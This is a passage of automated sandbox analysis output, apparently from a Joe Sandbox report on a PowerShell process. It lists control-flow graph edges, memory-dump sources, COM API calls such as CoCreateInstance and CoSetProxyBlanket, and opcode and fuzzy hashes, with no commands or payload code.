7ff848f24ef8 70->75 72 7ff848f27281-7ff848f2728d 71->72 73 7ff848f27270-7ff848f2727c call 7ff848f24d20 71->73 77 7ff848f27379-7ff848f27384 72->77 78 7ff848f27293-7ff848f272a7 72->78 73->72 75->71 82 7ff848f27392-7ff848f273a5 77->82 83 7ff848f27386-7ff848f2738d call 7ff848f24f10 77->83 89 7ff848f272a9-7ff848f272dc 78->89 90 7ff848f272df-7ff848f272ef 78->90 92 7ff848f273d0-7ff848f273dc 82->92 93 7ff848f273a7-7ff848f273b5 82->93 83->82 94 7ff848f26eb9-7ff848f26ecb 86->94 95 7ff848f270d7-7ff848f270e3 86->95 89->90 104 7ff848f272f1-7ff848f27324 90->104 105 7ff848f27353-7ff848f27374 call 7ff848f24e40 90->105 106 7ff848f273e2-7ff848f2743d 92->106 107 7ff848f27515-7ff848f27521 92->107 100 7ff848f273c1-7ff848f273cb call 7ff848f24d50 93->100 101 7ff848f273b7 93->101 102 7ff848f26ed1-7ff848f26ede 94->102 103 7ff848f27085-7ff848f270d2 call 7ff848f24ce8 94->103 95->62 99 7ff848f270e9-7ff848f270fa 95->99 111 7ff848f2712b-7ff848f2717d call 7ff848f24ce8 99->111 112 7ff848f270fc-7ff848f27113 99->112 100->92 101->100 113 7ff848f27052-7ff848f2705c 102->113 114 7ff848f26ee4-7ff848f26f89 102->114 103->95 104->105 105->77 142 7ff848f275fc-7ff848f27608 call 7ff848f24d98 106->142 143 7ff848f27443-7ff848f27457 106->143 109 7ff848f2755d-7ff848f27568 107->109 110 7ff848f27523-7ff848f2752f 107->110 120 7ff848f2756e-7ff848f27579 109->120 121 7ff848f27760-7ff848f2776b 109->121 110->109 119 7ff848f27531-7ff848f27558 call 7ff848f24f18 110->119 111->62 112->111 135 7ff848f2705e-7ff848f27062 113->135 136 7ff848f27064-7ff848f27065 113->136 119->109 120->121 127 7ff848f2757f-7ff848f275c5 call 7ff848f24ed0 call 7ff848f24d98 120->127 131 7ff848f27779-7ff848f2779d call 7ff848f24d00 121->131 132 7ff848f2776d-7ff848f27774 call 7ff848f24ed0 121->132 200 7ff848f275ee-7ff848f275fa call 7ff848f24d88 127->200 201 7ff848f275c7-7ff848f275eb call 7ff848f24d98 127->201 156 7ff848f2779f-7ff848f277a2 131->156 157 7ff848f2780e-7ff848f2781c 131->157 132->131 147 7ff848f27068-7ff848f2707f 135->147 136->147 169 7ff848f2760d-7ff848f27631 call 7ff848f23df0 call 7ff848f24d70 142->169 151 7ff848f27459-7ff848f2748c 143->151 152 7ff848f274bb-7ff848f27510 call 7ff848f24d60 143->152 147->102 147->103 151->152 152->107 166 7ff848f2781e-7ff848f2781f 156->166 167 7ff848f277a4 156->167 157->166 170 7ff848f27821-7ff848f27832 166->170 171 7ff848f2772b-7ff848f27739 call 7ff848f24d00 167->171 172 7ff848f277a6 167->172 192 7ff848f27633-7ff848f2763a call 7ff848f24ee0 169->192 193 7ff848f27644-7ff848f27653 call 7ff848f24d70 169->193 178 7ff848f277aa-7ff848f277b0 171->178 185 7ff848f2773b-7ff848f2773f 171->185 172->178 178->170 181 7ff848f277b2 178->181 187 7ff848f277c0-7ff848f277c1 181->187 185->187 190 7ff848f27741-7ff848f27748 185->190 196 7ff848f277c4-7ff848f277c8 187->196 195 7ff848f2774a-7ff848f2774f 190->195 190->196 204 7ff848f2763f 192->204 210 7ff848f2766a-7ff848f27710 call 7ff848f24df8 call 7ff848f25010 call 7ff848f25018 call 7ff848f24ed8 193->210 211 7ff848f27655-7ff848f27664 call 7ff848f24d70 193->211 195->61 203 7ff848f27751-7ff848f2775e 195->203 196->50 200->169 201->200 203->50 204->50 210->50 211->210 219 7ff848f27715-7ff848f27728 211->219 219->171
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: I
                                                        • API String ID: 0-3707901625
                                                        • Opcode ID: d896a62b9b8d2d785b77edf7e04dcd8ddd3b623a3055c79ad752557e83081796
                                                        • Instruction ID: 053ecff9118f425af71d03a6cde4102611921563b3566ce69d6933a1eec8587a
                                                        • Opcode Fuzzy Hash: d896a62b9b8d2d785b77edf7e04dcd8ddd3b623a3055c79ad752557e83081796
                                                        • Instruction Fuzzy Hash: 17828030A1DA4A8FEB95EB28D855BA973E1FF58340F5446B8D40DC72D6CF39A842CB44

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bb98308d384a20c29a34e8cc3c225344e73a9315c075cc4e52f0a730d587987
                                                        • Instruction ID: 8c84b796ee4575a4d0650a3b6b9962a67a467aa79fe7b31ab9855bd1b025cb10
                                                        • Opcode Fuzzy Hash: 8bb98308d384a20c29a34e8cc3c225344e73a9315c075cc4e52f0a730d587987
                                                        • Instruction Fuzzy Hash: B1A10631E1CE894FE759E72CA8496B97BE1EB9A350F0402BAD04DC32D2DF695C428395

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 441 7ff848f282fc-7ff848f28303 442 7ff848f2830e-7ff848f283dc CoSetProxyBlanket 441->442 443 7ff848f28305-7ff848f2830d 441->443 446 7ff848f283de 442->446 447 7ff848f283e4-7ff848f2840a 442->447 443->442 446->447
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID: BlanketProxy
                                                        • String ID:
                                                        • API String ID: 3890896728-0
                                                        • Opcode ID: 31c0dc4ad234bf3b03dadf8dd8c545ff6ec92c8fe012288df619e1e50a2230d0
                                                        • Instruction ID: 13f21d39c9aa5403e6f071be0dff647db58e1f788ab88a328139b6a141b0340c
                                                        • Opcode Fuzzy Hash: 31c0dc4ad234bf3b03dadf8dd8c545ff6ec92c8fe012288df619e1e50a2230d0
                                                        • Instruction Fuzzy Hash: 1841163191CB488FDB18DB58D8456E97BF0FBAA320F14426FE049C3252CB75A851CB85

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 449 7ff848f28bb4-7ff848f28bbb 450 7ff848f28bbd-7ff848f28bc5 449->450 451 7ff848f28bc6-7ff848f28c78 ObjectStublessClient3 449->451 450->451 453 7ff848f28c7a 451->453 454 7ff848f28c80-7ff848f28c9d 451->454 453->454
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID: Client3ObjectStubless
                                                        • String ID:
                                                        • API String ID: 3839999677-0
                                                        • Opcode ID: f5828225f44037800682c13688becbd82eba5cb91816c4048c2d8822d1db7f78
                                                        • Instruction ID: 851ddf522f707566afac5d51b7507db0e71477d1a785b46725c3a5b550f643ce
                                                        • Opcode Fuzzy Hash: f5828225f44037800682c13688becbd82eba5cb91816c4048c2d8822d1db7f78
                                                        • Instruction Fuzzy Hash: FC31E73191CA4C4FDB1CDB5C980A6F97BE1FB95321F10422FD049D3292DB746856CB95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 455 7ff848f2b509-7ff848f2b50d 456 7ff848f2b50f 455->456 457 7ff848f2b515 455->457 456->457 458 7ff848f2b518-7ff848f2b529 457->458 459 7ff848f2b517 457->459 460 7ff848f2b52b 458->460 461 7ff848f2b52c-7ff848f2b5c6 IUnknown_QueryInterface_Proxy 458->461 459->458 460->461 464 7ff848f2b5c8 461->464 465 7ff848f2b5ce-7ff848f2b5eb 461->465 464->465
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID: Interface_ProxyQueryUnknown_
                                                        • String ID:
                                                        • API String ID: 2522245112-0
                                                        • Opcode ID: 197aca41c530af1a7ffc54315dca03e23305870e6311610caa9730f5b09b3f09
                                                        • Instruction ID: a09fd78064a8cc0145d6dabfba321a5bb1a2f07b5ef8eedbff1ee7bcfdfbccc1
                                                        • Opcode Fuzzy Hash: 197aca41c530af1a7ffc54315dca03e23305870e6311610caa9730f5b09b3f09
                                                        • Instruction Fuzzy Hash: E131093191CB888FD725AB6CAC4A5F67FF4EB56321F04016FE089C3192DA256446CB86

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 466 7ff848f2aefd-7ff848f2af01 467 7ff848f2af09 466->467 468 7ff848f2af03 466->468 469 7ff848f2af0b 467->469 470 7ff848f2af0c-7ff848f2af1d 467->470 468->467 469->470 471 7ff848f2af1f 470->471 472 7ff848f2af20-7ff848f2afb6 ObjectStublessClient4 470->472 471->472 475 7ff848f2afb8 472->475 476 7ff848f2afbe-7ff848f2afdb 472->476 475->476
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID: Client4ObjectStubless
                                                        • String ID:
                                                        • API String ID: 2145431975-0
                                                        • Opcode ID: 2cc317f1d2cc0a0bfe2e756bad8e346b82f5fac0943e3d1550cf5cb7f791c815
                                                        • Instruction ID: 1576e649445695b2ca2e41d0482a864e2469b1cbc59d4dc227911c88ce775484
                                                        • Opcode Fuzzy Hash: 2cc317f1d2cc0a0bfe2e756bad8e346b82f5fac0943e3d1550cf5cb7f791c815
                                                        • Instruction Fuzzy Hash: CD31477091CB884FD715AB6CAC4A6B67FF0EB56321F04016FD0C9C3193DB24685ACB86

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 477 7ff848f280a9-7ff848f28149 CoCreateInstance 480 7ff848f2814b 477->480 481 7ff848f28151-7ff848f28177 477->481 480->481
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID:
                                                        • API String ID: 542301482-0
                                                        • Opcode ID: 9006a201d3344a3af5ac20894d48a9153b50d493f07675f9712772b3cf3de260
                                                        • Instruction ID: 01a1b8820cb14566b91e96ee852bcdbcff34e0a9014fa2d3054b48dfb1ce0c0b
                                                        • Opcode Fuzzy Hash: 9006a201d3344a3af5ac20894d48a9153b50d493f07675f9712772b3cf3de260
                                                        • Instruction Fuzzy Hash: AE31D431A0CA4C8FDB1CEB5CA8456B977E0FB99321F10422ED049C3652CB75A8528B85

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 493 7ff8492a8d10-7ff8492a8d12 494 7ff8492a8d14-7ff8492a8d2f 493->494 495 7ff8492a8d6f-7ff8492a8dc4 493->495 494->495 498 7ff8492a8dca-7ff8492a8dd4 495->498 499 7ff8492a902c-7ff8492a90eb 495->499 500 7ff8492a8dd6-7ff8492a8de3 498->500 501 7ff8492a8ded-7ff8492a8df2 498->501 500->501 508 7ff8492a8de5-7ff8492a8deb 500->508 503 7ff8492a8fd0-7ff8492a8fda 501->503 504 7ff8492a8df8-7ff8492a8dfb 501->504 506 7ff8492a8fe9-7ff8492a9029 503->506 507 7ff8492a8fdc-7ff8492a8fe8 503->507 509 7ff8492a8e12 504->509 510 7ff8492a8dfd-7ff8492a8e10 504->510 506->499 508->501 512 7ff8492a8e14-7ff8492a8e16 509->512 510->512 512->503 515 7ff8492a8e1c-7ff8492a8e50 512->515 527 7ff8492a8e52-7ff8492a8e65 515->527 528 7ff8492a8e67 515->528 531 7ff8492a8e69-7ff8492a8e6b 527->531 528->531 531->503 533 7ff8492a8e71-7ff8492a8e79 531->533 533->499 534 7ff8492a8e7f-7ff8492a8e89 533->534 535 7ff8492a8ea5-7ff8492a8eb5 534->535 536 7ff8492a8e8b-7ff8492a8ea3 534->536 535->503 539 7ff8492a8ebb-7ff8492a8eec 535->539 536->535 539->503 545 7ff8492a8ef2-7ff8492a8f1e 539->545 549 7ff8492a8f20-7ff8492a8f47 545->549 550 7ff8492a8f49 545->550 551 7ff8492a8f4b-7ff8492a8f4d 549->551 550->551 551->503 553 7ff8492a8f53-7ff8492a8f5b 551->553 554 7ff8492a8f6b 553->554 555 7ff8492a8f5d-7ff8492a8f67 553->555 558 7ff8492a8f70-7ff8492a8f82 554->558 556 7ff8492a8f87-7ff8492a8fa9 555->556 557 7ff8492a8f69 555->557 562 7ff8492a8fb0-7ff8492a8fb6 556->562 557->558 558->556 563 7ff8492a8fbd-7ff8492a8fcf 562->563
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4674518025.00007FF8492A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8492a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 382877913268e1cd47c8dee984af2fae6e1f3563fd3100f5000d1efc8565ae5f
                                                        • Instruction ID: 39b0611429039d17cf197b4624e26e2e7b76b3c3be4445c9f5d2bf2921119289
                                                        • Opcode Fuzzy Hash: 382877913268e1cd47c8dee984af2fae6e1f3563fd3100f5000d1efc8565ae5f
                                                        • Instruction Fuzzy Hash: EBD12332D0EBDA8FF7A5EF2858555B5BBE1FF553A4F0801BAD01CC7193EA18A8018341

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 636 7ff8492a8d35-7ff8492a8dc4 641 7ff8492a8dca-7ff8492a8dd4 636->641 642 7ff8492a902c-7ff8492a90eb 636->642 643 7ff8492a8dd6-7ff8492a8de3 641->643 644 7ff8492a8ded-7ff8492a8df2 641->644 643->644 651 7ff8492a8de5-7ff8492a8deb 643->651 646 7ff8492a8fd0-7ff8492a8fda 644->646 647 7ff8492a8df8-7ff8492a8dfb 644->647 649 7ff8492a8fe9-7ff8492a9029 646->649 650 7ff8492a8fdc-7ff8492a8fe8 646->650 652 7ff8492a8e12 647->652 653 7ff8492a8dfd-7ff8492a8e10 647->653 649->642 651->644 655 7ff8492a8e14-7ff8492a8e16 652->655 653->655 655->646 658 7ff8492a8e1c-7ff8492a8e50 655->658 670 7ff8492a8e52-7ff8492a8e65 658->670 671 7ff8492a8e67 658->671 674 7ff8492a8e69-7ff8492a8e6b 670->674 671->674 674->646 676 7ff8492a8e71-7ff8492a8e79 674->676 676->642 677 7ff8492a8e7f-7ff8492a8e89 676->677 678 7ff8492a8ea5-7ff8492a8eb5 677->678 679 7ff8492a8e8b-7ff8492a8ea3 677->679 678->646 682 7ff8492a8ebb-7ff8492a8eec 678->682 679->678 682->646 688 7ff8492a8ef2-7ff8492a8f1e 682->688 692 7ff8492a8f20-7ff8492a8f47 688->692 693 7ff8492a8f49 688->693 694 7ff8492a8f4b-7ff8492a8f4d 692->694 693->694 694->646 696 7ff8492a8f53-7ff8492a8f5b 694->696 697 7ff8492a8f6b 696->697 698 7ff8492a8f5d-7ff8492a8f67 696->698 701 7ff8492a8f70-7ff8492a8f82 697->701 699 7ff8492a8f87-7ff8492a8fb6 698->699 700 7ff8492a8f69 698->700 706 7ff8492a8fbd-7ff8492a8fcf 699->706 700->701 701->699
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4674518025.00007FF8492A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff8492a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6725e529ca8842c0501dbbf9255fa0d2ff70386f1ab75c85b5350d6c989baed7
                                                        • Instruction ID: d9e632240f31cbd2090055ee96b6ed5b9f5e927e318bdad4b28cf5cdb8a6d882
                                                        • Opcode Fuzzy Hash: 6725e529ca8842c0501dbbf9255fa0d2ff70386f1ab75c85b5350d6c989baed7
                                                        • Instruction Fuzzy Hash: 8B91D432D1EBE68FF7A6AF285865174BBE1EF16764B4800FAD058CB1D3D919AC058342

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4667289933.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a8969e9d484fa987b217ddcee00d0a818926038dade5b142bebe2f4a5b70d96
                                                        • Instruction ID: 07b3aa45687f06f99c098d12fd1a8096972a46d86967d5c90c8d9cb4b8c29b7f
                                                        • Opcode Fuzzy Hash: 2a8969e9d484fa987b217ddcee00d0a818926038dade5b142bebe2f4a5b70d96
                                                        • Instruction Fuzzy Hash: 69512A32E1EE864FF798AB2C5455275A6E1EF95790F08417EC00DC31D7EE1DAC058389

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4667289933.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57319b04bb4d3e91693633a510f130b91c1bdef5bfcf15a2137ba8a1f71c0e48
                                                        • Instruction ID: 42fd79e9020901a36f3bb17695814b0bf1afdcf4e56344a5590e17c361d94a81
                                                        • Opcode Fuzzy Hash: 57319b04bb4d3e91693633a510f130b91c1bdef5bfcf15a2137ba8a1f71c0e48
                                                        • Instruction Fuzzy Hash: 4051F332E0DE4A4FE7A9EB2C545167977E2EFA5660F5801BAC00EC71D3DF18E8018359
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4664962712.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848dfd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b2443c31ca7bda88189a40ca28e7ec3c45404b34409c2d6c8865110ff0651cf
                                                        • Instruction ID: a05f1bb6d64498ed768cd89df38dcdc0f68c358d6878a92381e8ca77b91ae9cb
                                                        • Opcode Fuzzy Hash: 6b2443c31ca7bda88189a40ca28e7ec3c45404b34409c2d6c8865110ff0651cf
                                                        • Instruction Fuzzy Hash: DF41D67180EBC44FE7569B399845A523FF0EF56360F1505DFE088CB1A3D625A84AC7A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4667289933.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4346b83b798312df20fb38cd815c6b5c00779d25960fc9f181beda57f5b45c7
                                                        • Instruction ID: 1bdcc25620e321e15668ff89fe9b23cfe24c1bbda5916c6fe76adf1e9de216a1
                                                        • Opcode Fuzzy Hash: d4346b83b798312df20fb38cd815c6b5c00779d25960fc9f181beda57f5b45c7
                                                        • Instruction Fuzzy Hash: 5B219132E0EE864FE7A9EB2C945157866D2EF64690F5905BAC01EC71E2DF1CEC01834A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4667289933.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1bd67478f5c07505ff177f2b2c55c5649154f3f9562dd4ebb976446cf2b1b9c2
                                                        • Instruction ID: 8dd53b708785ed5bfad71580a309b56b3f97acd5749fbf2baa2c522e0f910c77
                                                        • Opcode Fuzzy Hash: 1bd67478f5c07505ff177f2b2c55c5649154f3f9562dd4ebb976446cf2b1b9c2
                                                        • Instruction Fuzzy Hash: AD01A532E1EA9A1FF3A5B7682465174AAC2FFA4A90F5801FAC81CD35C6DE0C5C15429A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4667289933.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb8924a3d75c9c58c3abfd1a5ba94363ca3cdba848d2d402c111f108e03889be
                                                        • Instruction ID: ae73b9071c470d70afd760a8b02c27eb291424342fa8921c3b7d0276f2e0975c
                                                        • Opcode Fuzzy Hash: bb8924a3d75c9c58c3abfd1a5ba94363ca3cdba848d2d402c111f108e03889be
                                                        • Instruction Fuzzy Hash: ACF0BE31A0C9058FEB94EB4CE4458A8B3E0FF14361F0500B6E11DCB0A3DB2AEC40C755
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4665806903.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: _$}N_^
                                                        • API String ID: 0-721057702
                                                        • Opcode ID: bb5571e1b29c0ee3925382c7446bdd2bfd1803f1359530ec4369e5860ceeec21
                                                        • Instruction ID: bb264361bbebf6c2225f8bd5aa557a0ad16aea754584fbbfe6bf91c9d5d2ae6d
                                                        • Opcode Fuzzy Hash: bb5571e1b29c0ee3925382c7446bdd2bfd1803f1359530ec4369e5860ceeec21
                                                        • Instruction Fuzzy Hash: F7C2D836A0D5969EE751F72CA8521EA7BA0EF513B9F080177C14DCA0D3EF1D6C4683A8